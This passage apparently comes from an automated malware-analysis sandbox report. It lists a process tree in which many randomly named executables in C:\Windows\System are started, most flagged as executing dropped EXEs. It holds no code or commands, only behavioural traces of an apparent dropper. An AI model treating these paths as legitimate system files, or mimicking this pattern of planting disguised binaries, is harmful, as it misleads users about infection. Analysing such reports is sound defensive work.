  2⤵
  - Executes dropped EXE
  PID:3680
- C:\Windows\System\RjnPWvE.exe
  C:\Windows\System\RjnPWvE.exe
  2⤵
  - Executes dropped EXE
  PID:8
- C:\Windows\System\WkRgjcR.exe
  C:\Windows\System\WkRgjcR.exe
  2⤵
  - Executes dropped EXE
  PID:1140
- C:\Windows\System\ikPgqbl.exe
  C:\Windows\System\ikPgqbl.exe
  2⤵
  - Executes dropped EXE
  PID:1996
- C:\Windows\System\uXRaylF.exe
  C:\Windows\System\uXRaylF.exe
  2⤵
  - Executes dropped EXE
  PID:1748
- C:\Windows\System\CeLzsoj.exe
  C:\Windows\System\CeLzsoj.exe
  2⤵
  - Executes dropped EXE
  PID:4712
- C:\Windows\System\prUMRrC.exe
  C:\Windows\System\prUMRrC.exe
  2⤵
  - Executes dropped EXE
  PID:4796
- C:\Windows\System\GzoJYPU.exe
  C:\Windows\System\GzoJYPU.exe
  2⤵
  - Executes dropped EXE
  PID:3304
- C:\Windows\System\brDcHUg.exe
  C:\Windows\System\brDcHUg.exe
  2⤵
  - Executes dropped EXE
  PID:4704
- C:\Windows\System\jwKlQbJ.exe
  C:\Windows\System\jwKlQbJ.exe
  2⤵
  - Executes dropped EXE
  PID:2248
- C:\Windows\System\iSlhmQd.exe
  C:\Windows\System\iSlhmQd.exe
  2⤵
  - Executes dropped EXE
  PID:1012
- C:\Windows\System\qtstHKZ.exe
  C:\Windows\System\qtstHKZ.exe
  2⤵
  - Executes dropped EXE
  PID:4960
- C:\Windows\System\EFLWLme.exe
  C:\Windows\System\EFLWLme.exe
  2⤵
  - Executes dropped EXE
  PID:1992
- C:\Windows\System\DjxNnzC.exe
  C:\Windows\System\DjxNnzC.exe
  2⤵
  - Executes dropped EXE
  PID:2704
- C:\Windows\System\QvGsYDm.exe
  C:\Windows\System\QvGsYDm.exe
  2⤵
  - Executes dropped EXE
  PID:3716
- C:\Windows\System\NANvogr.exe
  C:\Windows\System\NANvogr.exe
  2⤵
  - Executes dropped EXE
  PID:4924
- C:\Windows\System\rdxtgpd.exe
  C:\Windows\System\rdxtgpd.exe
  2⤵
  - Executes dropped EXE
  PID:2240
- C:\Windows\System\FPYUgkD.exe
  C:\Windows\System\FPYUgkD.exe
  2⤵
  - Executes dropped EXE
  PID:4584
- C:\Windows\System\fwWEQaJ.exe
  C:\Windows\System\fwWEQaJ.exe
  2⤵
  - Executes dropped EXE
  PID:5104
- C:\Windows\System\KbIdiVI.exe
  C:\Windows\System\KbIdiVI.exe
  2⤵
  - Executes dropped EXE
  PID:3968
- C:\Windows\System\zGAZmMf.exe
  C:\Windows\System\zGAZmMf.exe
  2⤵
  - Executes dropped EXE
  PID:416
- C:\Windows\System\PQPfgAs.exe
  C:\Windows\System\PQPfgAs.exe
  2⤵
  - Executes dropped EXE
  PID:4740
- C:\Windows\System\lemPovn.exe
  C:\Windows\System\lemPovn.exe
  2⤵
  - Executes dropped EXE
  PID:4724
- C:\Windows\System\YnumAte.exe
  C:\Windows\System\YnumAte.exe
  2⤵
  - Executes dropped EXE
  PID:1388
- C:\Windows\System\QxPaDAz.exe
  C:\Windows\System\QxPaDAz.exe
  2⤵
  - Executes dropped EXE
  PID:2336
- C:\Windows\System\ODIdlbu.exe
  C:\Windows\System\ODIdlbu.exe
  2⤵
  - Executes dropped EXE
  PID:4052
- C:\Windows\System\KethDvB.exe
  C:\Windows\System\KethDvB.exe
  2⤵
  - Executes dropped EXE
  PID:3352
- C:\Windows\System\UbDrqhs.exe
  C:\Windows\System\UbDrqhs.exe
  2⤵
  - Executes dropped EXE
  PID:3484
- C:\Windows\System\OlWEPcj.exe
  C:\Windows\System\OlWEPcj.exe
  2⤵
  - Executes dropped EXE
  PID:4804
- C:\Windows\System\sExcNZz.exe
  C:\Windows\System\sExcNZz.exe
  2⤵
  - Executes dropped EXE
  PID:4236
- C:\Windows\System\OWERtmK.exe
  C:\Windows\System\OWERtmK.exe
  2⤵
  - Executes dropped EXE
  PID:4272
- C:\Windows\System\mWlWErY.exe
  C:\Windows\System\mWlWErY.exe
  2⤵
  - Executes dropped EXE
  PID:2392
- C:\Windows\System\SoOWYcb.exe
  C:\Windows\System\SoOWYcb.exe
  2⤵
  - Executes dropped EXE
  PID:1724
- C:\Windows\System\XAgkhoV.exe
  C:\Windows\System\XAgkhoV.exe
  2⤵
  - Executes dropped EXE
  PID:4088
- C:\Windows\System\McnfZWy.exe
  C:\Windows\System\McnfZWy.exe
  2⤵
  - Executes dropped EXE
  PID:1520
- C:\Windows\System\JCkcBrg.exe
  C:\Windows\System\JCkcBrg.exe
  2⤵
  - Executes dropped EXE
  PID:4648
- C:\Windows\System\fXpsALs.exe
  C:\Windows\System\fXpsALs.exe
  2⤵
  - Executes dropped EXE
  PID:3024
- C:\Windows\System\SXOzNfh.exe
  C:\Windows\System\SXOzNfh.exe
  2⤵
  - Executes dropped EXE
  PID:4428
- C:\Windows\System\wqyLyBi.exe
  C:\Windows\System\wqyLyBi.exe
  2⤵
  - Executes dropped EXE
  PID:4404
- C:\Windows\System\qWbpZAQ.exe
  C:\Windows\System\qWbpZAQ.exe
  2⤵
  - Executes dropped EXE
  PID:800
- C:\Windows\System\JPCmswa.exe
  C:\Windows\System\JPCmswa.exe
  2⤵
  - Executes dropped EXE
  PID:4736
- C:\Windows\System\hdyZnsu.exe
  C:\Windows\System\hdyZnsu.exe
  2⤵
  - Executes dropped EXE
  PID:3936
- C:\Windows\System\tPELhxR.exe
  C:\Windows\System\tPELhxR.exe
  2⤵
  - Executes dropped EXE
  PID:5112
- C:\Windows\System\BOXRPgG.exe
  C:\Windows\System\BOXRPgG.exe
  2⤵
  - Executes dropped EXE
  PID:1124
- C:\Windows\System\baJTOhE.exe
  C:\Windows\System\baJTOhE.exe
  2⤵
  - Executes dropped EXE
  PID:4628
- C:\Windows\System\DwGqWnx.exe
  C:\Windows\System\DwGqWnx.exe
  2⤵
  - Executes dropped EXE
  PID:1688
- C:\Windows\System\REPfuQp.exe
  C:\Windows\System\REPfuQp.exe
  2⤵
  - Executes dropped EXE
  PID:3400
- C:\Windows\System\MVBTPMA.exe
  C:\Windows\System\MVBTPMA.exe
  2⤵
  - Executes dropped EXE
  PID:4792
- C:\Windows\System\VqloNws.exe
  C:\Windows\System\VqloNws.exe
  2⤵
  - Executes dropped EXE
  PID:4024
- C:\Windows\System\auvkmgg.exe
  C:\Windows\System\auvkmgg.exe
  2⤵
  - Executes dropped EXE
  PID:4608
- C:\Windows\System\kLKzMCn.exe
  C:\Windows\System\kLKzMCn.exe
  2⤵
  - Executes dropped EXE
  PID:4524
- C:\Windows\System\EUhgkZV.exe
  C:\Windows\System\EUhgkZV.exe
  2⤵
  - Executes dropped EXE
  PID:964
- C:\Windows\System\DCWlnKH.exe
  C:\Windows\System\DCWlnKH.exe
  2⤵
  - Executes dropped EXE
  PID:2324
- C:\Windows\System\UHgYthP.exe
  C:\Windows\System\UHgYthP.exe
  2⤵
  - Executes dropped EXE
  PID:3492
- C:\Windows\System\TDHeUil.exe
  C:\Windows\System\TDHeUil.exe
  2⤵
  - Executes dropped EXE
  PID:4176
- C:\Windows\System\kOZPQKb.exe
  C:\Windows\System\kOZPQKb.exe
  2⤵
  - Executes dropped EXE
  PID:744
- C:\Windows\System\EgjMAqN.exe
  C:\Windows\System\EgjMAqN.exe
  2⤵
  PID:3932
- C:\Windows\System\zmvJXln.exe
  C:\Windows\System\zmvJXln.exe
  2⤵
  PID:3160
- C:\Windows\System\YrPIRJB.exe
  C:\Windows\System\YrPIRJB.exe
  2⤵
  PID:2264
- C:\Windows\System\FRqXkzH.exe
  C:\Windows\System\FRqXkzH.exe
  2⤵
  PID:2316
- C:\Windows\System\mDcXLfh.exe
  C:\Windows\System\mDcXLfh.exe
  2⤵
  PID:4812
- C:\Windows\System\ozrHwHF.exe
  C:\Windows\System\ozrHwHF.exe
  2⤵
  PID:1524
- C:\Windows\System\sEXYiLN.exe
  C:\Windows\System\sEXYiLN.exe
  2⤵
  PID:4184
- C:\Windows\System\WPZfSxU.exe
  C:\Windows\System\WPZfSxU.exe
  2⤵
  PID:2292
- C:\Windows\System\QmbNBfR.exe
  C:\Windows\System\QmbNBfR.exe
  2⤵
  PID:368
- C:\Windows\System\kUQSMvM.exe
  C:\Windows\System\kUQSMvM.exe
  2⤵
  PID:1228
- C:\Windows\System\vBNNYnn.exe
  C:\Windows\System\vBNNYnn.exe
  2⤵
  PID:3788
- C:\Windows\System\tCAlcNv.exe
  C:\Windows\System\tCAlcNv.exe
  2⤵
  PID:2344
- C:\Windows\System\ztOnIvd.exe
  C:\Windows\System\ztOnIvd.exe
  2⤵
  PID:3288
- C:\Windows\System\dpSehFO.exe
  C:\Windows\System\dpSehFO.exe
  2⤵
  PID:884
- C:\Windows\System\XsGmnHm.exe
  C:\Windows\System\XsGmnHm.exe
  2⤵
  PID:1736
- C:\Windows\System\dMpNxMS.exe
  C:\Windows\System\dMpNxMS.exe
  2⤵
  PID:5148
- C:\Windows\System\RQkLVgE.exe
  C:\Windows\System\RQkLVgE.exe
  2⤵
  PID:5176
- C:\Windows\System\SytgLni.exe
  C:\Windows\System\SytgLni.exe
  2⤵
  PID:5200
- C:\Windows\System\gDzvoCJ.exe
  C:\Windows\System\gDzvoCJ.exe
  2⤵
  PID:5228
- C:\Windows\System\qANRSta.exe
  C:\Windows\System\qANRSta.exe
  2⤵
  PID:5260
- C:\Windows\System\QuBRVKJ.exe
  C:\Windows\System\QuBRVKJ.exe
  2⤵
  PID:5288
- C:\Windows\System\jGxAFfQ.exe
  C:\Windows\System\jGxAFfQ.exe
  2⤵
  PID:5316
- C:\Windows\System\RCDBGAr.exe
  C:\Windows\System\RCDBGAr.exe
  2⤵
  PID:5340
- C:\Windows\System\tRtrahv.exe
  C:\Windows\System\tRtrahv.exe
  2⤵
  PID:5372
- C:\Windows\System\UecMmMe.exe
  C:\Windows\System\UecMmMe.exe
  2⤵
  PID:5400
- C:\Windows\System\DfnRGOy.exe
  C:\Windows\System\DfnRGOy.exe
  2⤵
  PID:5428
- C:\Windows\System\EBUodwE.exe
  C:\Windows\System\EBUodwE.exe
  2⤵
  PID:5456
- C:\Windows\System\tezqoMZ.exe
  C:\Windows\System\tezqoMZ.exe
  2⤵
  PID:5484
- C:\Windows\System\fTbsEfP.exe
  C:\Windows\System\fTbsEfP.exe
  2⤵
  PID:5508
- C:\Windows\System\thNGIae.exe
  C:\Windows\System\thNGIae.exe
  2⤵
  PID:5540
- C:\Windows\System\mkyoNKc.exe
  C:\Windows\System\mkyoNKc.exe
  2⤵
  PID:5568
- C:\Windows\System\FaNHfzp.exe
  C:\Windows\System\FaNHfzp.exe
  2⤵
  PID:5592
- C:\Windows\System\CaANPaE.exe
  C:\Windows\System\CaANPaE.exe
  2⤵
  PID:5620
- C:\Windows\System\uPndwkf.exe
  C:\Windows\System\uPndwkf.exe
  2⤵
  PID:5648
- C:\Windows\System\sTqEtDX.exe
  C:\Windows\System\sTqEtDX.exe
  2⤵
  PID:5680
- C:\Windows\System\XXKdkPT.exe
  C:\Windows\System\XXKdkPT.exe
  2⤵
  PID:5708
- C:\Windows\System\ymfyZmn.exe
  C:\Windows\System\ymfyZmn.exe
  2⤵
  PID:5744
- C:\Windows\System\JKxsxyF.exe
  C:\Windows\System\JKxsxyF.exe
  2⤵
  PID:5776
- C:\Windows\System\CEGYxFY.exe
  C:\Windows\System\CEGYxFY.exe
  2⤵
  PID:5796
- C:\Windows\System\DdBuIrQ.exe
  C:\Windows\System\DdBuIrQ.exe
  2⤵
  PID:5824
- C:\Windows\System\glSPAFx.exe
  C:\Windows\System\glSPAFx.exe
  2⤵
  PID:5852
- C:\Windows\System\vfJaOTi.exe
  C:\Windows\System\vfJaOTi.exe
  2⤵
  PID:5880
- C:\Windows\System\PDPkQwC.exe
  C:\Windows\System\PDPkQwC.exe
  2⤵
  PID:5900
- C:\Windows\System\lBEPolC.exe
  C:\Windows\System\lBEPolC.exe
  2⤵
  PID:5932
- C:\Windows\System\ENxvTHo.exe
  C:\Windows\System\ENxvTHo.exe
  2⤵
  PID:5964
- C:\Windows\System\pwEsYeM.exe
  C:\Windows\System\pwEsYeM.exe
  2⤵
  PID:5992
- C:\Windows\System\ZzdRxxg.exe
  C:\Windows\System\ZzdRxxg.exe
  2⤵
  PID:6024
- C:\Windows\System\IGgoJFo.exe
  C:\Windows\System\IGgoJFo.exe
  2⤵
  PID:6056
- C:\Windows\System\eUMcTRx.exe
  C:\Windows\System\eUMcTRx.exe
  2⤵
  PID:6084
- C:\Windows\System\YsLKveB.exe
  C:\Windows\System\YsLKveB.exe
  2⤵
  PID:6112
- C:\Windows\System\rAFdQhF.exe
  C:\Windows\System\rAFdQhF.exe
  2⤵
  PID:6140
- C:\Windows\System\YYmQVTZ.exe
  C:\Windows\System\YYmQVTZ.exe
  2⤵
  PID:3240
- C:\Windows\System\khnNPkF.exe
  C:\Windows\System\khnNPkF.exe
  2⤵
  PID:3456
- C:\Windows\System\KnPGErN.exe
  C:\Windows\System\KnPGErN.exe
  2⤵
  PID:3760
- C:\Windows\System\ANQXGnC.exe
  C:\Windows\System\ANQXGnC.exe
  2⤵
  PID:532
- C:\Windows\System\YYDAnSv.exe
  C:\Windows\System\YYDAnSv.exe
  2⤵
  PID:5132
- C:\Windows\System\nVTpcup.exe
  C:\Windows\System\nVTpcup.exe
  2⤵
  PID:5192
- C:\Windows\System\eOrxLZR.exe
  C:\Windows\System\eOrxLZR.exe
  2⤵
  PID:5272
- C:\Windows\System\vbljEnj.exe
  C:\Windows\System\vbljEnj.exe
  2⤵
  PID:5392
- C:\Windows\System\QxjrvKn.exe
  C:\Windows\System\QxjrvKn.exe
  2⤵
  PID:5472
- C:\Windows\System\bUDBJPO.exe
  C:\Windows\System\bUDBJPO.exe
  2⤵
  PID:5504
- C:\Windows\System\zWdxwoJ.exe
  C:\Windows\System\zWdxwoJ.exe
  2⤵
  PID:2192
- C:\Windows\System\mNcYNVd.exe
  C:\Windows\System\mNcYNVd.exe
  2⤵
  PID:5580
- C:\Windows\System\TUwOarU.exe
  C:\Windows\System\TUwOarU.exe
  2⤵
  PID:5640
- C:\Windows\System\KcFsHFE.exe
  C:\Windows\System\KcFsHFE.exe
  2⤵
  PID:5724
- C:\Windows\System\HuwpsPD.exe
  C:\Windows\System\HuwpsPD.exe
  2⤵
  PID:5768
- C:\Windows\System\FAOBDCL.exe
  C:\Windows\System\FAOBDCL.exe
  2⤵
  PID:5892
- C:\Windows\System\KIuCRJk.exe
  C:\Windows\System\KIuCRJk.exe
  2⤵
  PID:6000
- C:\Windows\System\wedkEhF.exe
  C:\Windows\System\wedkEhF.exe
  2⤵
  PID:5980
- C:\Windows\System\HAwsDwx.exe
  C:\Windows\System\HAwsDwx.exe
  2⤵
  PID:6012
- C:\Windows\System\IUsKZIo.exe
  C:\Windows\System\IUsKZIo.exe
  2⤵
  PID:2920
- C:\Windows\System\MzPHiMv.exe
  C:\Windows\System\MzPHiMv.exe
  2⤵
  PID:6052
- C:\Windows\System\rxbwmbo.exe
  C:\Windows\System\rxbwmbo.exe
  2⤵
  PID:6108
- C:\Windows\System\ClUnjpC.exe
  C:\Windows\System\ClUnjpC.exe
  2⤵
  PID:208
- C:\Windows\System\PDheGBN.exe
  C:\Windows\System\PDheGBN.exe
  2⤵
  PID:4356
- C:\Windows\System\GjzOhhB.exe
  C:\Windows\System\GjzOhhB.exe
  2⤵
  PID:3708
- C:\Windows\System\LAEnMIQ.exe
  C:\Windows\System\LAEnMIQ.exe
  2⤵
  PID:1784
- C:\Windows\System\ZsQtxPw.exe
  C:\Windows\System\ZsQtxPw.exe
  2⤵
  PID:2516
- C:\Windows\System\bVTRmwW.exe
  C:\Windows\System\bVTRmwW.exe
  2⤵
  PID:5168
- C:\Windows\System\wLSwYkT.exe
  C:\Windows\System\wLSwYkT.exe
  2⤵
  PID:2616
- C:\Windows\System\ZKnaYqZ.exe
  C:\Windows\System\ZKnaYqZ.exe
  2⤵
  PID:4004
- C:\Windows\System\RKMarzU.exe
  C:\Windows\System\RKMarzU.exe
  2⤵
  PID:4784
- C:\Windows\System\umGSAXg.exe
  C:\Windows\System\umGSAXg.exe
  2⤵
  PID:5448
- C:\Windows\System\wCNAVJP.exe
  C:\Windows\System\wCNAVJP.exe
  2⤵
  PID:5528
- C:\Windows\System\IjrCcYI.exe
  C:\Windows\System\IjrCcYI.exe
  2⤵
  PID:5608
- C:\Windows\System\wVAIbAa.exe
  C:\Windows\System\wVAIbAa.exe
  2⤵
  PID:5704
- C:\Windows\System\pwCbNiE.exe
  C:\Windows\System\pwCbNiE.exe
  2⤵
  PID:5808
- C:\Windows\System\VQipyVF.exe
  C:\Windows\System\VQipyVF.exe
  2⤵
  PID:5984
- C:\Windows\System\HaeDAFQ.exe
  C:\Windows\System\HaeDAFQ.exe
  2⤵
  PID:4916
- C:\Windows\System\JJLgRUU.exe
  C:\Windows\System\JJLgRUU.exe
  2⤵
  PID:2300
- C:\Windows\System\pkITLAF.exe
  C:\Windows\System\pkITLAF.exe
  2⤵
  PID:5220
- C:\Windows\System\lJxYtIL.exe
  C:\Windows\System\lJxYtIL.exe
  2⤵
  PID:5840
- C:\Windows\System\idLVTCx.exe
  C:\Windows\System\idLVTCx.exe
  2⤵
  PID:2340
- C:\Windows\System\hJJxNcU.exe
  C:\Windows\System\hJJxNcU.exe
  2⤵
  PID:6248
- C:\Windows\System\AxEyPfO.exe
  C:\Windows\System\AxEyPfO.exe
  2⤵
  PID:6280
- C:\Windows\System\GbzmkcQ.exe
  C:\Windows\System\GbzmkcQ.exe
  2⤵
  PID:6324
- C:\Windows\System\nirVKyJ.exe
  C:\Windows\System\nirVKyJ.exe
  2⤵
  PID:6400
- C:\Windows\System\OjiOezC.exe
  C:\Windows\System\OjiOezC.exe
  2⤵
  PID:6440
- C:\Windows\System\BUrFIew.exe
  C:\Windows\System\BUrFIew.exe
  2⤵
  PID:6500
- C:\Windows\System\bRjcdOa.exe
  C:\Windows\System\bRjcdOa.exe
  2⤵
  PID:6584
- C:\Windows\System\mLgpUcR.exe
  C:\Windows\System\mLgpUcR.exe
  2⤵
  PID:6604
- C:\Windows\System\LPbJUlz.exe
  C:\Windows\System\LPbJUlz.exe
  2⤵
  PID:6620
- C:\Windows\System\mLeIBRX.exe
  C:\Windows\System\mLeIBRX.exe
  2⤵
  PID:6656
- C:\Windows\System\IVRPRnO.exe
  C:\Windows\System\IVRPRnO.exe
  2⤵
  PID:6684
- C:\Windows\System\wxBADAU.exe
  C:\Windows\System\wxBADAU.exe
  2⤵
  PID:6724
- C:\Windows\System\rjGdTpV.exe
  C:\Windows\System\rjGdTpV.exe
  2⤵
  PID:6752
- C:\Windows\System\hMbjJds.exe
  C:\Windows\System\hMbjJds.exe
  2⤵
  PID:6772
- C:\Windows\System\XXvHXLh.exe
  C:\Windows\System\XXvHXLh.exe
  2⤵
  PID:6800
- C:\Windows\System\NNpnQVj.exe
  C:\Windows\System\NNpnQVj.exe
  2⤵
  PID:6828
- C:\Windows\System\fNtdOfD.exe
  C:\Windows\System\fNtdOfD.exe
  2⤵
  PID:6968
- C:\Windows\System\UwvYjnq.exe
  C:\Windows\System\UwvYjnq.exe
  2⤵
  PID:6988
- C:\Windows\System\QXalGtu.exe
  C:\Windows\System\QXalGtu.exe
  2⤵
  PID:7072
- C:\Windows\System\YJNPRUE.exe
  C:\Windows\System\YJNPRUE.exe
  2⤵
  PID:7156
- C:\Windows\System\OQUVbLj.exe
  C:\Windows\System\OQUVbLj.exe
  2⤵
  PID:6160
- C:\Windows\System\dEKGpoy.exe
  C:\Windows\System\dEKGpoy.exe
  2⤵
  PID:3208
- C:\Windows\System\kxTcYQk.exe
  C:\Windows\System\kxTcYQk.exe
  2⤵
  PID:6212
- C:\Windows\System\SZKZtaB.exe
  C:\Windows\System\SZKZtaB.exe
  2⤵
  PID:2684
- C:\Windows\System\CofiKta.exe
  C:\Windows\System\CofiKta.exe
  2⤵
  PID:6320
- C:\Windows\System\oVXemLY.exe
  C:\Windows\System\oVXemLY.exe
  2⤵
  PID:6392
- C:\Windows\System\YLOPrMQ.exe
  C:\Windows\System\YLOPrMQ.exe
  2⤵
  PID:6452
- C:\Windows\System\vaAKQFH.exe
  C:\Windows\System\vaAKQFH.exe
  2⤵
  PID:6516
- C:\Windows\System\iiULdug.exe
  C:\Windows\System\iiULdug.exe
  2⤵
  PID:6612
- C:\Windows\System\OklhiHp.exe
  C:\Windows\System\OklhiHp.exe
  2⤵
  PID:6744
- C:\Windows\System\dRpHCZR.exe
  C:\Windows\System\dRpHCZR.exe
  2⤵
  PID:6740
- C:\Windows\System\GDRvNYj.exe
  C:\Windows\System\GDRvNYj.exe
  2⤵
  PID:6712
- C:\Windows\System\DsYqmGf.exe
  C:\Windows\System\DsYqmGf.exe
  2⤵
  PID:6860
- C:\Windows\System\TCIGCud.exe
  C:\Windows\System\TCIGCud.exe
  2⤵
  PID:7008
- C:\Windows\System\ysvEeIg.exe
  C:\Windows\System\ysvEeIg.exe
  2⤵
  PID:6896
- C:\Windows\System\xzRYmNz.exe
  C:\Windows\System\xzRYmNz.exe
  2⤵
  PID:6948
- C:\Windows\System\ejdbucC.exe
  C:\Windows\System\ejdbucC.exe
  2⤵
  PID:7044
- C:\Windows\System\WrZjLnz.exe
  C:\Windows\System\WrZjLnz.exe
  2⤵
  PID:7068
- C:\Windows\System\BWRompu.exe
  C:\Windows\System\BWRompu.exe
  2⤵
  PID:7164
- C:\Windows\System\JOnDOGp.exe
  C:\Windows\System\JOnDOGp.exe
  2⤵
  PID:5552
- C:\Windows\System\YdbtWzi.exe
  C:\Windows\System\YdbtWzi.exe
  2⤵
  PID:6176
- C:\Windows\System\RkknDXG.exe
  C:\Windows\System\RkknDXG.exe
  2⤵
  PID:6196
- C:\Windows\System\dkSBolt.exe
  C:\Windows\System\dkSBolt.exe
  2⤵
  PID:6236
- C:\Windows\System\MGoovwf.exe
  C:\Windows\System\MGoovwf.exe
  2⤵
  PID:6412
- C:\Windows\System\jImCrvH.exe
  C:\Windows\System\jImCrvH.exe
  2⤵
  PID:6264
- C:\Windows\System\IiWIytZ.exe
  C:\Windows\System\IiWIytZ.exe
  2⤵
  PID:6308
- C:\Windows\System\MvdEWuM.exe
  C:\Windows\System\MvdEWuM.exe
  2⤵
  PID:6644
- C:\Windows\System\AYaAxQS.exe
  C:\Windows\System\AYaAxQS.exe
  2⤵
  PID:6880
- C:\Windows\System\ruMoBSM.exe
  C:\Windows\System\ruMoBSM.exe
  2⤵
  PID:6768
- C:\Windows\System\JkukUOy.exe
  C:\Windows\System\JkukUOy.exe
  2⤵
  PID:6888
- C:\Windows\System\njNkMXT.exe
  C:\Windows\System\njNkMXT.exe
  2⤵
  PID:6928
- C:\Windows\System\XipRKtT.exe
  C:\Windows\System\XipRKtT.exe
  2⤵
  PID:7064
- C:\Windows\System\HiYeMGt.exe
  C:\Windows\System\HiYeMGt.exe
  2⤵
  PID:6156
- C:\Windows\System\sSCAqIB.exe
  C:\Windows\System\sSCAqIB.exe
  2⤵
  PID:6628
- C:\Windows\System\cDYwzuR.exe
  C:\Windows\System\cDYwzuR.exe
  2⤵
  PID:6548
- C:\Windows\System\zFyVFKV.exe
  C:\Windows\System\zFyVFKV.exe
  2⤵
  PID:6732
- C:\Windows\System\gCVgFqg.exe
  C:\Windows\System\gCVgFqg.exe
  2⤵
  PID:6808
- C:\Windows\System\SaxULAC.exe
  C:\Windows\System\SaxULAC.exe
  2⤵
  PID:7140
- C:\Windows\System\BxjdjAJ.exe
  C:\Windows\System\BxjdjAJ.exe
  2⤵
  PID:7148
- C:\Windows\System\rmHKxWC.exe
  C:\Windows\System\rmHKxWC.exe
  2⤵
  PID:6240
- C:\Windows\System\LcEGCMQ.exe
  C:\Windows\System\LcEGCMQ.exe
  2⤵
  PID:7116
- C:\Windows\System\NPoYsMI.exe
  C:\Windows\System\NPoYsMI.exe
  2⤵
  PID:6300
- C:\Windows\System\niOxadp.exe
  C:\Windows\System\niOxadp.exe
  2⤵
  PID:6792
- C:\Windows\System\qMPEgAN.exe
  C:\Windows\System\qMPEgAN.exe
  2⤵
  PID:3876
- C:\Windows\System\eJsMpYi.exe
  C:\Windows\System\eJsMpYi.exe
  2⤵
  PID:7096
- C:\Windows\System\oONokct.exe
  C:\Windows\System\oONokct.exe
  2⤵
  PID:7184
- C:\Windows\System\vNzfukR.exe
  C:\Windows\System\vNzfukR.exe
  2⤵
  PID:7204
- C:\Windows\System\UpIdxGa.exe
  C:\Windows\System\UpIdxGa.exe
  2⤵
  PID:7228
- C:\Windows\System\dhGOBCk.exe
  C:\Windows\System\dhGOBCk.exe
  2⤵
  PID:7252
- C:\Windows\System\FXBNVVk.exe
  C:\Windows\System\FXBNVVk.exe
  2⤵
  PID:7332
- C:\Windows\System\hbMbGjK.exe
  C:\Windows\System\hbMbGjK.exe
  2⤵
  PID:7352
- C:\Windows\System\tuTDOYt.exe
  C:\Windows\System\tuTDOYt.exe
  2⤵
  PID:7412
- C:\Windows\System\qjoOHoG.exe
  C:\Windows\System\qjoOHoG.exe
  2⤵
  PID:7440
- C:\Windows\System\hMNPNqW.exe
  C:\Windows\System\hMNPNqW.exe
  2⤵
  PID:7492
- C:\Windows\System\przfQSw.exe
  C:\Windows\System\przfQSw.exe
  2⤵
  PID:7528
- C:\Windows\System\Owmaijw.exe
  C:\Windows\System\Owmaijw.exe
  2⤵
  PID:7560
- C:\Windows\System\vMMrrOX.exe
  C:\Windows\System\vMMrrOX.exe
  2⤵
  PID:7580
- C:\Windows\System\DCYwcpi.exe
  C:\Windows\System\DCYwcpi.exe
  2⤵
  PID:7600
- C:\Windows\System\yxouSSo.exe
  C:\Windows\System\yxouSSo.exe
  2⤵
  PID:7656
- C:\Windows\System\gOFKSjQ.exe
  C:\Windows\System\gOFKSjQ.exe
  2⤵
  PID:7696
- C:\Windows\System\VAYWkBP.exe
  C:\Windows\System\VAYWkBP.exe
  2⤵
  PID:7728
- C:\Windows\System\NDMbRZJ.exe
  C:\Windows\System\NDMbRZJ.exe
  2⤵
  PID:7752
- C:\Windows\System\xBlBFYH.exe
  C:\Windows\System\xBlBFYH.exe
  2⤵
  PID:7776
- C:\Windows\System\AFASebQ.exe
  C:\Windows\System\AFASebQ.exe
  2⤵
  PID:7804
- C:\Windows\System\wpaayrk.exe
  C:\Windows\System\wpaayrk.exe
  2⤵
  PID:7832
- C:\Windows\System\LYwRrqD.exe
  C:\Windows\System\LYwRrqD.exe
  2⤵
  PID:7852
- C:\Windows\System\HeTIClM.exe
  C:\Windows\System\HeTIClM.exe
  2⤵
  PID:7868
- C:\Windows\System\nOVnhcX.exe
  C:\Windows\System\nOVnhcX.exe
  2⤵
  PID:7888
- C:\Windows\System\ZhpyIoj.exe
  C:\Windows\System\ZhpyIoj.exe
  2⤵
  PID:7944
- C:\Windows\System\ifwqCxS.exe
  C:\Windows\System\ifwqCxS.exe
  2⤵
  PID:8004
- C:\Windows\System\soVwaMg.exe
  C:\Windows\System\soVwaMg.exe
  2⤵
  PID:8024
- C:\Windows\System\cLcLDkq.exe
  C:\Windows\System\cLcLDkq.exe
  2⤵
  PID:8080
- C:\Windows\System\RYkQJaa.exe
  C:\Windows\System\RYkQJaa.exe
  2⤵
  PID:8096
- C:\Windows\System\cyZkFOe.exe
  C:\Windows\System\cyZkFOe.exe
  2⤵
  PID:8144
- C:\Windows\System\QQZHIpj.exe
  C:\Windows\System\QQZHIpj.exe
  2⤵
  PID:8164
- C:\Windows\System\pOQwDDj.exe
  C:\Windows\System\pOQwDDj.exe
  2⤵
  PID:6664
- C:\Windows\System\NxSEgYW.exe
  C:\Windows\System\NxSEgYW.exe
  2⤵
  PID:6244
- C:\Windows\System\eCCLfkC.exe
  C:\Windows\System\eCCLfkC.exe
  2⤵
  PID:7216
- C:\Windows\System\oEvgzsH.exe
  C:\Windows\System\oEvgzsH.exe
  2⤵
  PID:1952
- C:\Windows\System\NWgQddL.exe
  C:\Windows\System\NWgQddL.exe
  2⤵
  PID:7316
- C:\Windows\System\xxIESgD.exe
  C:\Windows\System\xxIESgD.exe
  2⤵
  PID:7288
- C:\Windows\System\GKVPZLS.exe
  C:\Windows\System\GKVPZLS.exe
  2⤵
  PID:7400
- C:\Windows\System\yMDnDug.exe
  C:\Windows\System\yMDnDug.exe
  2⤵
  PID:7392
- C:\Windows\System\WHmHmij.exe
  C:\Windows\System\WHmHmij.exe
  2⤵
  PID:7512
- C:\Windows\System\ilRWNsD.exe
  C:\Windows\System\ilRWNsD.exe
  2⤵
  PID:7548
- C:\Windows\System\xuOdgSq.exe
  C:\Windows\System\xuOdgSq.exe
  2⤵
  PID:7608
- C:\Windows\System\ZGqaYhW.exe
  C:\Windows\System\ZGqaYhW.exe
  2⤵
  PID:7684
- C:\Windows\System\HnxfUeH.exe
  C:\Windows\System\HnxfUeH.exe
  2⤵
  PID:7736
- C:\Windows\System\JUUDuEW.exe
  C:\Windows\System\JUUDuEW.exe
  2⤵
  PID:7708
- C:\Windows\System\QrrEEdM.exe
  C:\Windows\System\QrrEEdM.exe
  2⤵
  PID:7792
- C:\Windows\System\YRqSPMI.exe
  C:\Windows\System\YRqSPMI.exe
  2⤵
  PID:7788
- C:\Windows\System\jhlMVfv.exe
  C:\Windows\System\jhlMVfv.exe
  2⤵
  PID:7864
- C:\Windows\System\yraXxng.exe
  C:\Windows\System\yraXxng.exe
  2⤵
  PID:7928
- C:\Windows\System\YzMCSFs.exe
  C:\Windows\System\YzMCSFs.exe
  2⤵
  PID:8052
- C:\Windows\System\VbgHJiZ.exe
  C:\Windows\System\VbgHJiZ.exe
  2⤵
  PID:8076
